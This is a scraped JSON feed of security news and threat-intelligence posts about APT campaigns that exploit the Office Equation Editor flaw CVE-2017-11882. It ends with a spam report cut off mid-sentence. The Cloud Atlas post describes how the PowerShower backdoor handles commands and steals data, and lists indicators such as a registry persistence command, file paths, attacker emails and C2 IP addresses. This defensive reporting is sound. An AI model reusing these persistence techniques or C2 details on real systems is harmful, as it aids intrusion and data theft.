[CVE-2018-0802](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0802>), to activate the infection sequence.\n\n\"Actors often change their tools to avoid detection or attribution, this is part of the lifecycle of a threat actor showing its capability and determination,\" Ventura said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T12:37:00", "type": "thn", "title": "Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2022-05-12T01:27:46", "id": "THN:75586AE52D0AAF674F942498C96A2F6A", "href": "https://thehackernews.com/2022/05/bitter-apt-hackers-add-bangladesh-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:28", "description": "[![cyber-espionage-watering-hole-attack](https://thehackernews.com/images/-BTinSqvRUEs/WyKFLRrpXEI/AAAAAAAAxFI/TLQizch-N3MXO5s-YDgsXM5p-gmJxYlngCLcBGAs/s728-e100/cyber-espionage-watering-hole-attack.png)](<https://thehackernews.com/images/-BTinSqvRUEs/WyKFLRrpXEI/AAAAAAAAxFI/TLQizch-N3MXO5s-YDgsXM5p-gmJxYlngCLcBGAs/s728-e100/cyber-espionage-watering-hole-attack.png>)\n\nCybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed central Asian country in order to conduct watering hole attacks. \n \nThe campaign is believed to be active covertly since fall 2017 but was spotted in March by security researchers from Kaspersky Labs, who have attributed these attacks to a Chinese-speaking threat actor group called **LuckyMouse**. \n \nLuckyMouse, also known as Iron Tiger, EmissaryPanda, APT 27 and Threat Group-3390, is the same group of Chinese hackers who was found targeting [Asian countries with Bitcoin mining malware](<https://thehackernews.com/2018/02/cyber-espionage-asia.html>) early this year. \n \nThe group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors. \n \nThis time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \"access to a wide range of government resources at one fell swoop.\" \n \nAccording to the researchers, the group injected malicious JavaScript code into the official government websites associated with the data center in order to conduct watering hole attacks. \n\n\n[![chinese hackers watering hole attack](https://thehackernews.com/images/-QuiYgbvS6yU/WyKDXGDjLPI/AAAAAAAAxE8/xEaZMtqp9_04MT9bb0S1wAo4XspBBqD_gCLcBGAs/s728-e100/chinese-hackers.png)](<https://thehackernews.com/images/-QuiYgbvS6yU/WyKDXGDjLPI/AAAAAAAAxE8/xEaZMtqp9_04MT9bb0S1wAo4XspBBqD_gCLcBGAs/s728-e100/chinese-hackers.png>)\n\nAlthough LuckyMouse has been spotted using a widely used [Microsoft Office vulnerability](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>) (CVE-2017-11882) to weaponize Office documents in the past, researchers have no proofs of this technique being used in this particular attack against the data center. \n \nThe initial attack vector used in the attack against the data center is unclear, but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center. \n \nThe attack against the data center eventually infected the targeted system with a piece of malware called HyperBro, a Remote Access Trojan (RAT) deployed to maintain persistence in the targeted system and for remote administration. \n\n\n> \"There were traces of HyperBro in the infected data center from mid-November 2017. Shortly after that different users in the country started being redirected to the malicious domain update.iaacstudio[.]com as a result of the waterholing of government websites,\" the researchers said in a [blog post](<https://securelist.com/luckymouse-hits-national-data-center/86083/>) published today.\n\n> \"These events suggest that the data center infected with HyperBro and the waterholing campaign are connected.\"\n\nAs a result of the waterholing attack, the compromised government websites redirected the country's visitors to either penetration testing suite Browser Exploitation Framework (BeEF) that focuses on the web browser, or the ScanBox reconnaissance framework, which perform the same tasks as a keylogger. \n \nThe main command and control (C&C) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP, specifically to a MikroTik router running a firmware version released in March 2016. \n \nResearchers believe the Mikrotik router was explicitly hacked for the campaign in order to process the HyperBro malware's HTTP requests without detection.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-06-14T15:10:00", "type": "thn", "title": "Chinese Hackers Carried Out Country-Level Watering Hole Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2018-06-14T15:10:03", "id": "THN:7489F5CF1C31FDAC5F67F700D5DDCD5B", "href": "https://thehackernews.com/2018/06/chinese-watering-hole-attack.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:11", "description": "[![Hacker Group](https://thehackernews.com/new-images/img/a/AVvXsEhB2s9e9YTpk2G9Ucyf0f-n8ZPoo2tlQ8zsNhX3Jgv4IhzSFXQ9s6zdTZ4FIfFdO09TH0XSkClcJtsGp3XUT6H9wTEsMGT60qmoXfrdOsia0baz7OeUw8o6EIK2guCZij-URwXsPnEYhB8_hYySJXDT_CAFNWcXEehI3eqRZgwTO42zB-66bN4YPIAT=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEhB2s9e9YTpk2G9Ucyf0f-n8ZPoo2tlQ8zsNhX3Jgv4IhzSFXQ9s6zdTZ4FIfFdO09TH0XSkClcJtsGp3XUT6H9wTEsMGT60qmoXfrdOsia0baz7OeUw8o6EIK2guCZij-URwXsPnEYhB8_hYySJXDT_CAFNWcXEehI3eqRZgwTO42zB-66bN4YPIAT>)\n\nA new malware campaign targeting Afghanistan and India is exploiting a now-patched, 20-year-old flaw affecting Microsoft Office to deploy an array of commodity remote access trojans (RATs) that allow the adversary to gain complete control over the compromised endpoints.\n\nCisco Talos attributed the cyber campaign to a \"lone wolf\" threat actor operating a Lahore-based fake IT company called Bunse Technologies as a front to carry out the malicious activities, while also having a history of sharing content that's in favor of Pakistan and Taliban dating all the way back to 2016.\n\nThe attacks work by taking advantage of political and government-themed lure domains that host the malware payloads, with the infection chains leveraging weaponized RTF documents and PowerShell scripts that distribute malware to victims. Specifically, the laced RTF files were found exploiting [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2017-11882>) to execute a PowerShell command that's responsible for deploying additional malware to conduct reconnaissance on the machine.\n\n[![](https://thehackernews.com/new-images/img/a/AVvXsEgjwJb2EGN7CEzD088pZv9x_-bgg_iq1wev33AMsTmOKKf9LcO7QYxO7lYgEsByB74C5dYdzhbBXDik-EzAG4BWYB7bbw0tOra7nuFiGb0a4ryq1SQOfUlnEcTmVN_tiSjIDmvb8uybfl0BfHhsuKllu2SPfe2gEtc7hhUfgh74hNIelAJksFyTMPFJ)](<https://thehackernews.com/new-images/img/a/AVvXsEgjwJb2EGN7CEzD088pZv9x_-bgg_iq1wev33AMsTmOKKf9LcO7QYxO7lYgEsByB74C5dYdzhbBXDik-EzAG4BWYB7bbw0tOra7nuFiGb0a4ryq1SQOfUlnEcTmVN_tiSjIDmvb8uybfl0BfHhsuKllu2SPfe2gEtc7hhUfgh74hNIelAJksFyTMPFJ>)\n\nCVE-2017-11882 [concerns](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>) a [memory corruption](<https://thehackernews.com/2017/11/cobalt-strike-malware.html>) vulnerability that could be abused to run arbitrary code The flaw, which is believed to have existed since 2000, was eventually addressed by Microsoft as part of its Patch Tuesday updates for November 2017.\n\nThe recon phase is followed by a similar attack chain that uses the aforementioned vulnerability to run a series of instructions that culminates in the installation of commodity malware such as DcRAT and QuasarRAT that come with a variety of functionalities right out of the box including remote shells, process management, file management, keylogging, and credential theft, thus requiring minimal efforts on part of the attacker.\n\nAlso observed during the cybercrime operation is a browser credential stealer for Brave, Microsoft Edge, Mozilla Firefox, Google Chrome, Opera, Opera GX, and Yandex Browser.\n\n\"This campaign is a classic example of an individual threat actor employing political, humanitarian and diplomatic themes in a campaign to deliver commodity malware to victims,\" the researchers [said](<https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html>). Commodity RAT families are increasingly being used by both crimeware and APT groups to infect their targets. These families also act as excellent launch pads for deploying additional malware against their victims.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-22T15:01:00", "type": "thn", "title": "'Lone Wolf' Hacker Group Targeting Afghanistan and India with Commodity RATs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-10-23T04:23:26", "id": "THN:FBCEC8F0CE0D3932FE4C315878C48403", "href": "https://thehackernews.com/2021/10/lone-wolf-hacker-group-targeting.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:31", "description": "[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjHzJ_qgSssKi0XRWnJhDirWgqL4EHa5A-jFA6N1Mm3-sTnLTOFhjwFZ3ce97brsL7vtVD5joITWbti5hNnICJsFJIpy4bcrKg1ELhQeGjzfrQlEvcQbYmyN_DTGeLP7lFmZTU2jIr45uI2feJXOI_AZe5xhOr_q0AU0-U2nXeEkYORMSetLT4PaIxN/s728-e100/russi.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjHzJ_qgSssKi0XRWnJhDirWgqL4EHa5A-jFA6N1Mm3-sTnLTOFhjwFZ3ce97brsL7vtVD5joITWbti5hNnICJsFJIpy4bcrKg1ELhQeGjzfrQlEvcQbYmyN_DTGeLP7lFmZTU2jIr45uI2feJXOI_AZe5xhOr_q0AU0-U2nXeEkYORMSetLT4PaIxN/s728-e100/russi.jpg>)\n\nAt least three different advanced persistent threat (APT) groups from across the world have launched spear-phishing campaigns in mid-March 2022 using the ongoing Russo-Ukrainian war as a lure to distribute malware and steal sensitive information.\n\nThe campaigns, undertaken by El Machete, Lyceum, and SideWinder, have targeted a variety of sectors, including energy, financial, and governmental sectors in Nicaragua, Venezuela, Israel, Saudi Arabia, and Pakistan.\n\n\"The attackers use decoys ranging from official-looking documents to news articles or even job postings, depending on the targets and region,\" Check Point Research [said](<https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/>) in a report. \"Many of these lure documents utilize malicious macros or template injection to gain an initial foothold into the targeted organizations, and then launch malware attacks.\"\n\nThe infection chains of [El Machete](<https://malpedia.caad.fkie.fraunhofer.de/actor/el_machete>), a Spanish-speaking threat actor first documented in August 2014 by Kaspersky, involve the use of macro-laced decoy documents to deploy an open-source remote access trojan called [Loki.Rat](<https://github.com/TheGeekHT/Loki.Rat/>) that's capable of harvesting keystrokes, credentials, and clipboard data as well as carrying out file operations and executing arbitrary commands.\n\n[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEipwxFpJPvd4PwFayruHDl_v1r8MWauiWrx8wIdliZdr8G6lRirPqrjRZmbPmfhkXvjaWF7y3UB6a9NRZ3ImXe3sB-wd2bCtBTcwPc2Y-pt-45hB0eyu7nUpmsOSKD6ZLZH-8aczH1b3T0lQYoX1KtSPYKLLfXhehQshFStDhg7TutwLf9aM0uzgh4Q/s728-e100/malware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEipwxFpJPvd4PwFayruHDl_v1r8MWauiWrx8wIdliZdr8G6lRirPqrjRZmbPmfhkXvjaWF7y3UB6a9NRZ3ImXe3sB-wd2bCtBTcwPc2Y-pt-45hB0eyu7nUpmsOSKD6ZLZH-8aczH1b3T0lQYoX1KtSPYKLLfXhehQshFStDhg7TutwLf9aM0uzgh4Q/s728-e100/malware.jpg>)\n\nA second campaign is from the Iranian APT group known as [Lyceum](<https://thehackernews.com/2022/02/iranian-hackers-using-new-marlin.html>) that Check Point said launched a phishing attack using an email purportedly about \"Russian war crimes in Ukraine\" to deliver first-stage .NET and Golang droppers, which are then used to deploy a backdoor for running files retrieved from a remote server.\n\n[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgMYUcKZ5xlMLlWlMH_CWnc2EL0BwBc1WvWbvRRc7TCz1EKGsHGWrXNKf2VdHyaTm83BZX-cD3KO1RCa_rNvXheN_16zhutQRMzg0Oe9runRnXlD4RppeLeLkLoEnfBzm_pGbEKE9i66BJJxifN1S012kLWJ6NcpGEzk9jXOKk-vELIH_w8CJFPwgoY/s728-e100/email.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgMYUcKZ5xlMLlWlMH_CWnc2EL0BwBc1WvWbvRRc7TCz1EKGsHGWrXNKf2VdHyaTm83BZX-cD3KO1RCa_rNvXheN_16zhutQRMzg0Oe9runRnXlD4RppeLeLkLoEnfBzm_pGbEKE9i66BJJxifN1S012kLWJ6NcpGEzk9jXOKk-vELIH_w8CJFPwgoY/s728-e100/email.jpg>)\n\nAnother example is [SideWinder](<https://thehackernews.com/2021/07/sidecopy-hackers-target-indian.html>), a state-sponsored hacking crew that's said to operate in support of Indian political interests and with a specific focus on its neighbors China and [Pakistan](<https://cluster25.io/2021/09/10/a-rattlesnake-in-the-navy/>). The attack sequence, in this case, employs a weaponized document that exploits the Equation Editor flaw in Microsoft Office ([CVE-2017-11882](<https://thehackernews.com/2021/10/lone-wolf-hacker-group-targeting.html>)) to distribute an information stealing malware.\n\nThe findings echo similar warnings from Google's Threat Analysis Group (TAG), which [disclosed](<https://thehackernews.com/2022/03/hackers-increasingly-using-browser-in.html>) that nation-state-backed threat groups from Iran, China, North Korea, and Russia and numerous other criminal and financially motivated actors are leveraging war-related themes in phishing campaigns, online extortion attempts, and other malicious activities.\n\n\"Although the attention of the public does not usually linger on a single issue for an extended period, the Russian-Ukrainian war is an obvious exception,\" the Israeli company said. \"This war affects multiple regions around the world and has potentially far-reaching ramifications. As a result, we can expect that APT threat actors will continue to use this crisis to conduct targeted phishing campaigns for espionage purposes.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-04T11:13:00", "type": "thn", "title": "Multiple Hacker Groups Capitalizing on Ukraine Conflict for Distributing Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2022-04-05T03:13:43", "id": "THN:E50F78394BCAE6FF3B8EE8482A81A3C4", "href": "https://thehackernews.com/2022/04/multiple-hacker-groups-capitalizing-on.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2019-08-12T19:33:22", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12093813/abstract-cloud-990x400.jpg)\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victims - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. \n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And his new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain relying no more on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower ;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique by victim so it can't be searched via file hash on the host.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "cvss3": {}, "published": "2019-08-12T10:00:58", "type": "securelist", "title": "Recent Cloud Atlas activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15084744/spam_report_q1_2019-990x400.jpg)\n\n## Quarterly highlights\n\n### Valentine's Day\n\nAs per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)\n\nBut most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)\n\n### New Apple products\n\nLate March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.\n\n_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)\n\n_Fake Apple ID login pages_\n\nScammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)\n\n### Fake technical support\n\nFake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)\n\n_Fake \"Kaspersky Lab support service\" accounts_\n\nAll these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.\n\n### New Instagram \"features\"\n\nLast year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full \u2014 not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.\n\nCybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)\n\nAs usual in such schemes, the \"buyer\" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)\n\n### Mailshot phishing\n\nIn Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization 